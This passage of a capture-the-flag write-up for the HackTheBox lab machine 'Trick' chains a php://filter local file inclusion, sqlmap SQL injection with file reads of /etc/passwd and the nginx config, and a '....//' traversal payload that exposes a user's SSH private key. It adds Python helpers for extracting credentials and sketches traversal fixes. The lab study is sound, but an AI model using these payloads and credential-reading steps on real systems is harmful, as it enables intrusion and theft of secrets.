Foothold
The payroll LFI also gives source disclosure through the php://filter wrapper: with convert.base64-encode in the chain, include() receives base64 text instead of PHP, so the file comes back in the response body instead of being executed.
/index.php?page=php://filter/read=convert.base64-encode/resource=payroll
The same read against db_connect (by its name, the application's database connection include) is the useful one:
GET /index.php?page=php://filter/read=convert.base64-encode/resource=db_connect
Base64-decode the response and the MySQL credentials fall out:
remo:TrulyImpossiblePasswordLmao123
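The three steps above (build the filter URL, decode the base64 that comes back, pull the credentials out of the decoded PHP), as an added example that is not the write-up's own tooling. The sample response body and the credentials inside it are constructed for illustration; they are not the real db_connect contents.

```python
import base64
import re
import urllib.request
from urllib.parse import quote

# Added example, not from the original write-up.  Builds the php://filter
# read used above, decodes the base64 body that comes back, and greps the
# recovered PHP for a mysqli connection call.

FILTER_CHAIN = "php://filter/read=convert.base64-encode/resource="


def filter_url(base: str, resource: str, param: str = "page") -> str:
    """Build <base>?page=php://filter/read=convert.base64-encode/resource=<name>.

    include() on the target sees a stream of base64 text rather than PHP,
    so the source is returned instead of executed.  '/', ':' and '=' are
    kept out of percent-encoding so the wrapper syntax survives."""
    return f"{base}?{param}={quote(FILTER_CHAIN + resource, safe='/:=')}"


# A base64 run long enough to be the filter output rather than a stray word.
_B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_filter_body(body: str) -> str:
    """Take the longest base64-looking token in the response and decode it.

    The filter output is usually embedded in the including page's HTML, so
    decoding the whole body would fail; the longest run is the payload."""
    runs = _B64_RE.findall(body)
    if not runs:
        raise ValueError("no base64 payload in response body")
    blob = max(runs, key=len)
    return base64.b64decode(blob, validate=True).decode("utf-8", "replace")


# new mysqli(host, user, pass, ...) / mysqli_connect(host, user, pass, ...)
_CONN_RE = re.compile(
    r"(?:new\s+mysqli|mysqli_connect|mysql_connect)\s*\(\s*"
    r"['\"]([^'\"]*)['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*,\s*['\"]([^'\"]*)['\"]"
)


def extract_db_creds(source: str):
    """Return {'host','user','password'} from the first connection call, or None."""
    m = _CONN_RE.search(source)
    if not m:
        return None
    host, user, password = m.groups()
    return {"host": host, "user": user, "password": password}


def fetch_source(base: str, resource: str, timeout: float = 10.0) -> str:
    """Live version of the three steps; not called by default."""
    with urllib.request.urlopen(filter_url(base, resource), timeout=timeout) as r:
        return decode_filter_body(r.read().decode("utf-8", "replace"))


# Constructed sample: what a db_connect.php might look like once decoded,
# wrapped in the HTML an include()-ing index.php would print around it.
SAMPLE_SOURCE = """<?php
$conn = new mysqli('localhost', 'remo', 'S3cret-Example', 'payroll_db');
"""
SAMPLE_BODY = (
    "<html><body>"
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + "</body></html>"
)

if __name__ == "__main__":
    print(filter_url("http://preprod-payroll.trick.htb/index.php", "db_connect"))
    src = decode_filter_body(SAMPLE_BODY)
    print(src)
    print(extract_db_creds(src))
```

The regex grabs only the first connection call; a config that builds the DSN from constants (define('DB_PASS', ...)) needs a second pattern, which is the usual reason to eyeball the decoded file anyway.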
Now take another look at the login SQLi. sqlmap confirms the injection point in the POST username parameter, both boolean-blind and error-based:
adot@pwndot:~/htb/trick$ sqlmap -r login.req --batch --level=5 --risk=3 --technique=BEU
___
__H__
___ ___[,]_____ ___ ___ {1.9#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
<SNIP>
[08:36:30] [INFO] testing 'MySQL UNION query (50) - 61 to 80 columns'
[08:36:31] [INFO] testing 'MySQL UNION query (100) - 81 to 100 columns'
[08:36:32] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 591 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=a' OR NOT 4668=4668-- iwVv&password=aa
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=a' OR (SELECT 2021 FROM(SELECT COUNT(*),CONCAT(0x716b6b7871,(SELECT (ELT(2021=2021,1))),0x716b6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Gcxp&password=aa
---
[08:36:32] [INFO] the back-end DBMS is MySQL
Check what the database user can do. MySQL's FILE privilege is the one to look for, since it lets LOAD_FILE() read files from the database host; sqlmap's --privilege asks exactly that:
adot@pwndot:~/htb/trick$ sqlmap -r login.req --batch --level=5 --risk=3 --technique=BEU --privilege
___
__H__
___ ___[)]_____ ___ ___ {1.9#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
<SNIP>
[08:36:39] [INFO] fetching database users privileges
[08:36:40] [INFO] retrieved: ''remo'@'localhost''
[08:36:40] [INFO] retrieved: 'FILE'
database management system users privileges:
[*] 'remo'@'localhost' [1]:
privilege: FILE
[08:36:40] [INFO] fetched data logged to text files under '/home/adot/.local/share/sqlmap/output/preprod-payroll.trick.htb'
[*] ending @ 08:36:40 /2025-02-25/
remo has FILE, so --file-read pulls files off the box through LOAD_FILE(). Two limits apply: the file has to be readable by the OS user mysqld runs as, and secure_file_priv, when set, restricts which directories LOAD_FILE() may touch. Neither gets in the way here:
adot@pwndot:~/htb/trick$ sqlmap -r login.req --batch --level=5 --risk=3 --technique=BEU --file-read=/etc/passwd
___
__H__
___ ___["]_____ ___ ___ {1.9#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
<SNIP>
[08:41:52] [INFO] fingerprinting the back-end DBMS operating system
[08:41:52] [INFO] the back-end DBMS operating system is Linux
[08:41:52] [INFO] fetching file: '/etc/passwd'
<SNIP>
Nothing in /etc/passwd logs us in directly, so pull the nginx config next to see what else the box serves:
adot@pwndot:~/htb/trick$ sqlmap -r login.req --batch --level=5 --risk=3 --technique=BEU --file-read=/etc/nginx/sites-enabled/default
___
__H__
___ ___["]_____ ___ ___ {1.9#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
<SNIP>
adot@pwndot:~/htb/trick$ cat /home/adot/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_nginx_sites-enabled_default
server {
listen 80 default_server;
listen [::]:80 default_server;
server_name trick.htb;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;
server_name _;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php7.3-fpm.sock;
}
}
server {
listen 80;
listen [::]:80;
server_name preprod-marketing.trick.htb;
root /var/www/market;
index index.php;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
}
}
server {
listen 80;
listen [::]:80;
server_name preprod-payroll.trick.htb;
root /var/www/payroll;
index index.php;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php7.3-fpm.sock;
}
}
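A small parser for the config read above, as an added example (not part of the write-up): it turns each server block into a record so the vhosts, their roots and the php-fpm socket each is handed to can be compared, and it emits the /etc/hosts line for the names it finds. NGINX_CONF is a copy of the file shown above, trimmed to the directives the parser reads.

```python
import re

# Added example, not from the write-up.  Minimal nginx server-block parser:
# tracks brace depth so directives inside location{} still attach to the
# enclosing server, and collects only the directives we care about.

NGINX_CONF = r"""
server {
    listen 80 default_server;
    server_name trick.htb;
    root /var/www/html;
    server_name _;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
    }
}
server {
    listen 80;
    server_name preprod-marketing.trick.htb;
    root /var/www/market;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
    }
}
server {
    listen 80;
    server_name preprod-payroll.trick.htb;
    root /var/www/payroll;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
    }
}
"""

_SERVER_OPEN = re.compile(r"^server\s*\{$")


def parse_server_blocks(conf: str):
    """Return one dict per server{} block: server_name (list), root, fastcgi_pass."""
    blocks, current, depth = [], None, 0
    for raw in conf.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if _SERVER_OPEN.match(line):
            current, depth = {"server_name": [], "root": None, "fastcgi_pass": None}, 1
            continue
        if current is None:
            continue
        if line.endswith("{"):          # location{} or similar: descend
            depth += 1
            continue
        if line == "}":
            depth -= 1
            if depth == 0:              # closed the server block
                blocks.append(current)
                current = None
            continue
        key, _, value = line.rstrip(";").partition(" ")
        if key == "server_name":        # may repeat; nginx takes all names
            current["server_name"].extend(value.split())
        elif key in ("root", "fastcgi_pass"):
            current[key] = value
    return blocks


def vhosts_by_socket(blocks):
    """Group vhost names by the php-fpm socket they are proxied to."""
    out = {}
    for b in blocks:
        out.setdefault(b["fastcgi_pass"], []).extend(b["server_name"])
    return out


def hosts_line(ip: str, blocks) -> str:
    """Build the /etc/hosts line: every real name once, in config order, '_' skipped."""
    names = []
    for b in blocks:
        for n in b["server_name"]:
            if n != "_" and n not in names:
                names.append(n)
    return f"{ip} {' '.join(names)}"


if __name__ == "__main__":
    blocks = parse_server_blocks(NGINX_CONF)
    for sock, names in vhosts_by_socket(blocks).items():
        print(f"{sock}: {', '.join(names)}")
    print(hosts_line("10.10.11.166", blocks))
```

Grouping by socket is the point: a vhost on its own php-fpm pool usually means its PHP runs as a different OS user, so an LFI there reads a different set of files than the same bug on the shared pool.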
Besides the default server, the config reveals preprod-marketing.trick.htb, which was not in the hosts file yet. It is also the only vhost handed to a separate php-fpm pool, php7.3-fpm-michael.sock, so PHP under that vhost presumably runs as a different user (michael), and any file read through it sees what that user can read. Add the name to /etc/hosts:
adot@pwndot:~/htb/trick$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 Pixel7
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.11.166 trick.htb root.trick.htb preprod-payroll.trick.htb preprod-marketing.trick.htb
The marketing site includes its pages through a page parameter:
http://preprod-marketing.trick.htb/index.php?page=services.html
A plain ../ is filtered, but ....// gets through. The marketing site's source is not shown here, so this is an inference, but the usual cause is a single non-recursive str_replace of '../': removing the inner ../ from ....// leaves ../, and the traversal survives.
GET /index.php?page=....//....//....//....//....//etc/passwd
Consistent with the michael fpm pool, his private key is readable through the same traversal:
GET /index.php?page=....//....//....//....//....//home/michael/.ssh/id_rsa
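Why ....// survives, as an added example rather than anything from the box: the include filter below models one non-recursive removal of '../' (PHP's str_replace('../', '', $page)), which is an assumption since the marketing site's code is not on this page. Beside it are two fixes that do not rely on stripping at all. WEB_ROOT is the marketing root from the nginx config above.

```python
import posixpath
import re

# Added example, not code from the write-up or the target.  strip_once
# models the assumed filter; naive_include is the vulnerable resolution;
# contained_include and allowlisted_include are two ways to fix it.

WEB_ROOT = "/var/www/market"


def strip_once(page: str) -> str:
    """One left-to-right pass removing '../'.  str.replace is not recursive,
    exactly like PHP's str_replace: '....//' loses its middle '../' and
    what remains is '../' again."""
    return page.replace("../", "")


def naive_include(page: str) -> str:
    """Vulnerable: filter once, then join under the web root.
    Returns the path include() would end up opening."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, strip_once(page)))


def contained_include(page: str):
    """Fix 1 (containment): no string stripping at all.  Resolve the request
    lexically and refuse anything that lands outside WEB_ROOT.  Lexical only
    so it runs offline; on a real server also pass the result through
    os.path.realpath so a symlink under the root cannot point out of it."""
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, page))
    if candidate == WEB_ROOT or candidate.startswith(WEB_ROOT + "/"):
        return candidate
    return None


_PAGE_NAME = re.compile(r"[A-Za-z0-9_-]+\.html")


def allowlisted_include(page: str):
    """Fix 2 (allow-list): the parameter only ever names a flat .html file,
    so accept exactly that shape and nothing else (no '/', no '..', no
    stream wrappers such as php://)."""
    if not _PAGE_NAME.fullmatch(page):
        return None
    return posixpath.join(WEB_ROOT, page)


if __name__ == "__main__":
    for p in ("services.html",
              "../../etc/passwd",
              "....//....//....//....//....//etc/passwd"):
        print(f"{p!r}")
        print(f"  naive     -> {naive_include(p)}")
        print(f"  contained -> {contained_include(p)}")
        print(f"  allowlist -> {allowlisted_include(p)}")
```

Note what contained_include does with the ....// payload: without the strip it is just a harmless (nonexistent) directory name under the root. The sanitiser is what manufactures the traversal, which is the general lesson about blacklist-style path cleaning.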
Save the key locally and set the permissions ssh insists on before it will use it:
adot@pwndot:~/htb/trick$ vi id_rsa
adot@pwndot:~/htb/trick$ chmod 600 id_rsa